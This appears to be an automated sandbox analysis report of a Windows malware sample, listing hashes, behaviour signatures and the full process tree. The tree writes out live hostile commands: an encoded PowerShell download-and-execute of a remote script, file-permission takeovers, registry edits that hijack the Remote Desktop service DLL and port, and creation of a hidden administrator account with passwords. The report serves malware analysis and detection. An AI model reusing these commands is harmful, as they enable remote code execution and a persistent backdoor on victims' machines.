Analysis
-
max time kernel
128s -
max time network
116s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
06-11-2020 11:02
General
-
Target
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
-
Size
3.3MB
-
MD5
f2d37d864716da449a7791199ad3eb40
-
SHA1
c04d0b96e4492e1cba6a9604addc1d8f40e98be8
-
SHA256
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b
-
SHA512
a03ba66cd51e3d9ef9bbbe0f82e704ca1da13aa089dc3e03cc13900ba8f64e432949928de975d4c103ce977707a983ad1a318dc07f1e3a00d4c8daf3c1e69469
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Windows directory 41 IoCs
-
Modifies data under HKEY_USERS 60 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of WriteProcessMemory 133 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3FDE.tmp" "c:\Users\Admin\AppData\Local\Temp\ntadosty\CSC918089AEFB9045FD8E57BB6F6838F66C.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 8oTGm0XS /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc 8oTGm0XS /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 8oTGm0XS /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 8oTGm0XS1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc 8oTGm0XS2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 8oTGm0XS3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES3FDE.tmpMD5
0375914593b948a36e267f39b56c6f2e
SHA14e5bd2b6d550a21d5b4b770617084492b4d185c2
SHA256b07d87250b79e8ece6d2bad60c129cffa6c79eadb2d4915976ab8f537894c059
SHA5124377d6369c67baa0bb05be84119f4c5f22888beea09ae669d2ca1c8b9c669ea7d8186d7c32922f75d74b8db8c81a7ef4bd8a544640ab0d169217d89f086b729c
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.dllMD5
9ded83e7d5f2493ec643f6f1425cedd3
SHA10be6a701fb835d57f3897101f4ea8b5e8d118e30
SHA256acfd252779091b2d77f1e7ff7fc1a36469de39c0809c5b67760c5ae7d7764caa
SHA5120249d4b68bd7927a1ac931c5f0b16db24c54dd5548c2060902f29a3e7bbb59eee827719345c5652380cc63fd14528affa9a7d24bc02028eda88825b0fbfbc7a6
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\ntadosty\CSC918089AEFB9045FD8E57BB6F6838F66C.TMPMD5
f5f225410f58978aa0a4e2067c9f76cb
SHA1594fc4e4a8d70282e7891cef66325f9cc3e1ddeb
SHA2565e8d8993c5bafe50e31c464be0fb510d0b2f1befa5797ed791c5d069d8091054
SHA5126bf07c202cfcd3c8b038bbe6f2e489bb372c7a122075512f8ff62d5c1c8cf0b7741fb1235a514cba43ae1b37c75326d6e4350ca3e3591d73a710e8025d2fbe86
-
\??\c:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.cmdlineMD5
00f91486673950c00e11f3ea78414b7b
SHA1e2846f616fade8ab175d5e0ed1572fe22e23afdd
SHA256bf81bc06cfc365cce95bfb1797c91d9afdc5319fa34e0cdb57c195b950151534
SHA512df2d87ae9697bf043741aedbda5ab439e695567ca3f6b1149f503161e190c6cd424954cae5781f15ad45bd2d2c86ed9db7d4a9ac31c563d005b4178725bafa96
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/268-48-0x0000000000000000-mapping.dmp
-
memory/408-73-0x0000000000000000-mapping.dmp
-
memory/408-10-0x0000000000000000-mapping.dmp
-
memory/528-69-0x0000000000000000-mapping.dmp
-
memory/544-55-0x0000000000000000-mapping.dmp
-
memory/576-13-0x0000000000000000-mapping.dmp
-
memory/628-78-0x0000000000000000-mapping.dmp
-
memory/916-52-0x0000000000000000-mapping.dmp
-
memory/920-53-0x0000000000000000-mapping.dmp
-
memory/956-51-0x0000000000000000-mapping.dmp
-
memory/1016-86-0x0000000000000000-mapping.dmp
-
memory/1016-45-0x0000000000000000-mapping.dmp
-
memory/1072-39-0x0000000000000000-mapping.dmp
-
memory/1084-42-0x0000000000000000-mapping.dmp
-
memory/1088-117-0x0000000000000000-mapping.dmp
-
memory/1404-80-0x0000000000000000-mapping.dmp
-
memory/1404-91-0x0000000000FF0000-0x0000000000FF1000-memory.dmpFilesize
4KB
-
memory/1404-96-0x0000000001030000-0x0000000001031000-memory.dmpFilesize
4KB
-
memory/1404-99-0x00000000010D0000-0x00000000010D1000-memory.dmpFilesize
4KB
-
memory/1404-107-0x0000000019550000-0x0000000019551000-memory.dmpFilesize
4KB
-
memory/1404-116-0x000000001AEB0000-0x000000001AEB1000-memory.dmpFilesize
4KB
-
memory/1404-108-0x000000001AAE0000-0x000000001AAE1000-memory.dmpFilesize
4KB
-
memory/1404-100-0x0000000019550000-0x0000000019551000-memory.dmpFilesize
4KB
-
memory/1404-115-0x000000001A050000-0x000000001A051000-memory.dmpFilesize
4KB
-
memory/1404-98-0x0000000001270000-0x0000000001271000-memory.dmpFilesize
4KB
-
memory/1404-97-0x00000000010C0000-0x00000000010C1000-memory.dmpFilesize
4KB
-
memory/1404-81-0x000007FEF5790000-0x000007FEF617C000-memory.dmpFilesize
9.9MB
-
memory/1416-67-0x0000000000000000-mapping.dmp
-
memory/1448-74-0x0000000000000000-mapping.dmp
-
memory/1516-77-0x0000000000000000-mapping.dmp
-
memory/1516-66-0x0000000000000000-mapping.dmp
-
memory/1520-70-0x0000000000000000-mapping.dmp
-
memory/1604-71-0x0000000000000000-mapping.dmp
-
memory/1628-56-0x0000000000000000-mapping.dmp
-
memory/1632-49-0x0000000000000000-mapping.dmp
-
memory/1648-54-0x0000000000000000-mapping.dmp
-
memory/1680-87-0x0000000000000000-mapping.dmp
-
memory/1684-50-0x0000000000000000-mapping.dmp
-
memory/1716-40-0x0000000000000000-mapping.dmp
-
memory/1840-9-0x000000001B5A0000-0x000000001B5A1000-memory.dmpFilesize
4KB
-
memory/1840-4-0x0000000002270000-0x0000000002271000-memory.dmpFilesize
4KB
-
memory/1840-5-0x000000001AAB0000-0x000000001AAB1000-memory.dmpFilesize
4KB
-
memory/1840-6-0x0000000002450000-0x0000000002451000-memory.dmpFilesize
4KB
-
memory/1840-33-0x0000000002530000-0x0000000002531000-memory.dmpFilesize
4KB
-
memory/1840-34-0x0000000002540000-0x0000000002541000-memory.dmpFilesize
4KB
-
memory/1840-17-0x000000001A890000-0x000000001A891000-memory.dmpFilesize
4KB
-
memory/1840-18-0x000000001C0D0000-0x000000001C0D1000-memory.dmpFilesize
4KB
-
memory/1840-2-0x0000000000000000-mapping.dmp
-
memory/1840-3-0x000007FEF5790000-0x000007FEF617C000-memory.dmpFilesize
9.9MB
-
memory/1840-35-0x000000001C140000-0x000000001C141000-memory.dmpFilesize
4KB
-
memory/1840-7-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1840-38-0x0000000002500000-0x0000000002510000-memory.dmpFilesize
64KB
-
memory/1840-21-0x000000001C100000-0x000000001C101000-memory.dmpFilesize
4KB
-
memory/1848-47-0x0000000000000000-mapping.dmp
-
memory/1848-64-0x0000000000000000-mapping.dmp
-
memory/1892-41-0x0000000000000000-mapping.dmp
-
memory/1904-57-0x0000000000000000-mapping.dmp
-
memory/1912-36-0x0000000000000000-mapping.dmp
-
memory/1920-63-0x0000000000000000-mapping.dmp
-
memory/1920-46-0x0000000000000000-mapping.dmp
-
memory/1940-118-0x0000000000000000-mapping.dmp
-
memory/1964-58-0x0000000000000000-mapping.dmp
-
memory/2000-61-0x0000000000000000-mapping.dmp
-
memory/2008-62-0x0000000000000000-mapping.dmp
-
memory/2016-79-0x0000000000000000-mapping.dmp
-
memory/2016-44-0x0000000000000000-mapping.dmp
-
memory/2016-72-0x0000000000000000-mapping.dmp
-
memory/2028-0-0x0000000002120000-0x000000000245D000-memory.dmpFilesize
3.2MB
-
memory/2028-43-0x0000000000000000-mapping.dmp
-
memory/2028-1-0x0000000002460000-0x0000000002471000-memory.dmpFilesize
68KB
